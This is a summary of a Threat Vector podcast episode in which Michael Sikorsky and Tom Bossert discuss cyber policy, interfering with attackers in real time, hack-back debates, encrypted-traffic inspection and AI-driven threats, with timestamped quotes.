Threat Vector: "From Policy to Cyber Interference"
Podcast: Threat Vector by Palo Alto Networks
Episode Date: August 28, 2025
Guest Host: Michael Sikorsky (CTO, Unit 42, Palo Alto Networks)
Guest: Tom Bossert (President, Trinity Cyber; former US Homeland Security Advisor; Distinguished Fellow, Atlantic Council)
Episode Overview
This episode of Threat Vector dives into the evolving intersection of national cybersecurity policy and real-world threat interference. Michael Sikorsky, stepping in as guest host, welcomes Tom Bossert to explore how proactive, mid-operation interference with cyber attackers is transforming both the private sector’s approach to defense and the larger policy landscape. Together, they examine why the industry’s current reactive strategies aren’t enough, debate the privatization of offensive cyber operations, and discuss the technical underpinnings of manipulating network traffic as a next-gen defense strategy.
Key Discussion Points & Insights
1. The State of Cybersecurity: From Detection to Interference
- Shift from Incident Response to Real-Time Interference
- Sikorsky shares the appeal of interfering with attackers mid-operation, contrasting it with traditional incident response, which often happens too late:
- "It's the idea of, like, messing with them as they're trying to attack us is just such a pleasant thing, because it seems like when you come and do incident response, it's like it's already too late, right?" (02:13)
- Bossert agrees, highlighting the satisfaction and effectiveness of disrupting adversaries directly, drawing parallels with government work but emphasizing new legal, commercial avenues:
- "You'd have to be in the government to do something that's directly intended to interfere with the adversary's operational outcome. But we found a way to do it in a commercial way that's legal, effective. It's just fun." (02:51)
- Sikorsky shares the appeal of interfering with attackers mid-operation, contrasting it with traditional incident response, which often happens too late:
2. Debate on Offensive Security and Policy Disconnects
-
Defining 'Offensive' and 'Defensive' Operations
- Bossert warns of a "massive disconnect" between policymakers’ rhetoric of 'hacking back' and the technical and operational realities:
- "One of my biggest fears is the massive disconnect between those policymakers that say that and what you know to be the case and how the tech works and what it really means." (04:05)
- Emphasizes that targeted, reciprocal action—using the adversary’s own momentum against them like "judo"—is more productive than indiscriminate retaliation:
- "It's reciprocal. The idea here is that we're not going to do anything to impose any consequence on you unless you first start it... It's like judo, where you take the energy of the attacker back on himself." (06:11)
- Bossert warns of a "massive disconnect" between policymakers’ rhetoric of 'hacking back' and the technical and operational realities:
-
Limits of 'Hack Back' and Policy Levers
- Challenges the effectiveness of tit-for-tat hacking, especially against adversaries like China:
- "Would they even care if we did the same [to them]? ...You want to hack all the Chinese businesses to get China to behave differently? I don't know. I don't think that's the best way." (05:29-06:51)
- Challenges the effectiveness of tit-for-tat hacking, especially against adversaries like China:
3. Privatization and the Role of Industry in Offensive Defense
- Private Sector Increasingly Engaged in Active Defense
- Sikorsky asks about the potential shift of offensive security from government agencies to the private sector.
- Bossert compares rules of engagement to military analogs: you "shoot back" only if attacked, not as an act of spite or revenge:
- "There's a misnomer in the cyber world that shoot back is kind of a pause thing ... we're trying to do here is to create friction. The kind of pain... that throws off their operations..." (07:31-08:24)
4. Transition from Policy to Operations
- Bossert’s Move from National Policy to Startup Execution
- Describes the need for those shaping policy to eventually return to operational roles for real impact:
- "If you don't eventually get tired of that and long deep back into some operational role where you can make a difference, well, you're not part of the solution." (08:47)
- The “spark” for joining Trinity was to be hands-on fighting threats in the real world, using boundary defense tech that has lasting effects— likened to an "electric fence":
- "It's an electric fence. You know, there's a consequence to touching it, and it changes the behavior of the people that consider touching it." (09:44)
- Describes the need for those shaping policy to eventually return to operational roles for real impact:
5. Challenges in Detection and Incident Response Overload
- Detection Overload and Transformation of Defense
- Sikorsky underscores that while the industry excels at detecting attacks, the outcome is "too many alerts" and "correlation fatigue":
- "The problem that we ended up creating was all of these alerts. Right. That like, everything is going off, some of them, some products better than others at sending out the alerts. But then you have all of these alerts now what do you do?" (10:49)
- Bossert critiques the focus on endpoint detection (the “target” side) versus focusing on the attacker:
- "How many endpoints are there? Millions. Billions... And the alerts that we're producing are coming from every enterprise target... There are not that many adversaries on the other end of this equation. Maybe ... 4,000 hackers that have in the world the skill set necessary..." (11:30)
- Sikorsky underscores that while the industry excels at detecting attacks, the outcome is "too many alerts" and "correlation fatigue":
6. Reversing the Problem: Attacker-Focused Defense
- Attackers Change Techniques Less Often than Defenders Think
- Proposes focusing on attacker techniques rather than constantly shifting IOCs:
- "If you can open up the network traffic and inspect it to a level of depth and content where you were confidently finding them, their techniques... you can start to make a more manageable outcome. That's what I mean by more fun." (13:20)
- Sikorsky introduces the "graph"—the closer you get to attacker behavior, the harder it is for them to adapt and the more effective defenses become:
- "The IOCs that are simple to change with a flip of a bit, that's not what you want to go after. You want to move as far to the developer as you can ..."(14:23)
- Both agree that targeting attacker TTPs (tactics, techniques, and procedures) imposes more cost and forces deeper changes—referencing David Bianco’s “Pyramid of Pain.” (15:29)
- Proposes focusing on attacker techniques rather than constantly shifting IOCs:
7. Technical Deep Dive: Network Traffic Manipulation & Break and Inspect
- Encrypted Traffic Inspection Challenges
- Sikorsky shares that even Palo Alto Networks’ customers resist "break and inspect," despite clear defensive benefits:
- "But one thing we have a big issue with still to this day is doing break and inspect of encrypted traffic... so many still don't." (16:59)
- Bossert explains the technical and organizational resistance—availability vs. security divisions—and argues for stronger executive leadership to prioritize security:
- "Anything that makes the Internet less reliable, less available, or slower, or even makes me do any work outside of what I already do. Is unnecessary to my outcomes. ...it is incumbent on them to reach down and to play referee in that debate." (18:01)
- Both criticize the industry for favoring technically easy but less effective compliance exercises over more impactful, but organizationally challenging, traffic inspection.
- Sikorsky shares that even Palo Alto Networks’ customers resist "break and inspect," despite clear defensive benefits:
8. Artificial Intelligence: Next Wave of Threats and Defenses
- AI on Offense and Defense
- Sikorsky describes “agentic” AI red teams—attackers using autonomous agents:
- "You give it a problem, it's outsolving, it's scanning, it's poking holes, it's grabbing payloads and embedding in malware and shipping off all on its own." (20:40)
- Bossert asserts that Trinity’s approach, focusing on content and technique, is uniquely effective against AI-generated attacks:
- "AI, no matter how it's trained... We're going to find the presence of the exploit in the content. ...We're going to find that and remove that appended data from the traffic in flight so that what gets to the endpoint doesn't have the AI generated payload in it." (21:25)
- Sikorsky describes “agentic” AI red teams—attackers using autonomous agents:
9. Policy, Self-Help, and the Future of Cybersecurity
- Personal Responsibility over Government Reliance
- Bossert issues a call to action for CISOs and organizations:
- "There is absolutely nothing that's going to change this current trend that we're on, other than the CISOs who are responsible for defending their networks, taking the right action, seeking the right Funding, applying the right sets of tools and innovative solutions..." (23:20)
- He is skeptical about government’s ability to solve cybersecurity, advocating for nonpartisan, operator-driven approaches:
- "The government's really got to stay in the world of doing what they are good at. ...there should be some kind of nonpartisan consensus that how to best defend the country and the businesses." (25:31)
- Bossert issues a call to action for CISOs and organizations:
10. Political and Cultural Challenges
- Regulation, Partisanship, and Cyber Norms
- Bossert laments growing partisanship’s impact on the formerly “righteous” cyber operator subculture:
- "The most disappointing thing for me is to see that this partisanship that's so ugly right now has now started to hit our community." (27:34)
- Emphasizes the fundamental principle: defense of property and data should be a nonpartisan, cultural imperative.
- Bossert laments growing partisanship’s impact on the formerly “righteous” cyber operator subculture:
Notable Quotes and Memorable Moments
| Timestamp | Speaker | Quote | |-----------|---------|-------| | 02:13 | Sikorsky | “Messing with them as they're trying to attack us is just such a pleasant thing... when you do incident response, it's already too late.” | | 02:51 | Bossert | “You'd have to be in government to do something that's directly intended to interfere with the adversary's operational outcome. But we found a way... that's legal, effective. It's just fun.” | | 06:11 | Bossert | "It's reciprocal. The idea here is that we're not going to do anything to impose any consequence on you unless you first start it... It's like judo, where you take the energy of the attacker back on himself." | | 08:47 | Bossert | “If you don't eventually get tired of that and long deep back into some operational role where you can make a difference, well, you're not part of the solution.” | | 13:20 | Bossert | “If you can open up the network traffic and inspect it to a level of depth... where you were confidently finding them, their techniques... you can start to make a more manageable outcome.” | | 15:29 | Bossert | “We've ended up encouraging them to create more ephemeral IOCs because we're going after those IOCs. And so it becomes not only not effective, but it becomes a cost center...” | | 21:25 | Bossert | “We're going to find the presence of the exploit in the content... remove that appended data from the traffic in flight so that what gets to the endpoint doesn't have the AI generated payload in it.” | | 23:20 | Bossert | “There is absolutely nothing that's going to change this current trend that we're on, other than the CISOs... taking the right action, seeking the right funding, applying the right sets of tools...” | | 25:31 | Bossert | "There should be some kind of nonpartisan consensus that how to best defend the country and the businesses." | | 27:43 | Bossert | “The most disappointing thing for me is to see that this partisanship... has now started to hit our community.” |
Fun Bonus Clip – Behind the Scenes
[30:10] The hosts share a light-hearted Kenny Loggins-themed password joke that goes right over Sikorsky’s head, much to Bossert’s amusement:
- "Hey, Mike, you know I changed all my passwords to Kenny. Now I have all Kenny logins."
- Sikorsky: "Just Danger zone. What Danger zone?"
- Bossert: "Do you hear it? Kenny Loggins."
- Team: Laughter ensues as Mike doesn’t get the reference.
- "Anybody listening? Kenny Loggins is a fantastic punchline. And Mike, just right over his head." (30:47)
Takeaway for Security Pros
This conversation highlights the urgency of attacker-focused, operational defense and the necessity for CISOs and security leaders to break old paradigms. Technical innovation—especially in manipulating traffic and identifying attacker techniques, even as threats are increasingly AI-powered—is the new frontier. Policy must catch up, but in the meantime, self-help, collaboration, and a willingness to "mess with" attackers within ethical and legal bounds are critical.
Recommended Segment Timestamps:
- [04:05] – Discussion on "offensive" vs. "defensive"
- [09:44] – Electric fence metaphor and motivation for innovation
- [13:20] – On attacker techniques and managing the scale
- [16:59] – Break and inspect debate in practice
- [20:40] – The AI arms race in offense vs. defense
- [23:20] – Call to action for organizational self-help
- [25:31] – The need for nonpartisan consensus
- [30:10] – Kenny Loggins joke (bonus moment)
Tone:
Candid, passionate, and direct, with plenty of technical depth and a clear operator’s mindset. The episode balances policy nuance with no-nonsense operational advice, punctuated by moments of humor and personal camaraderie.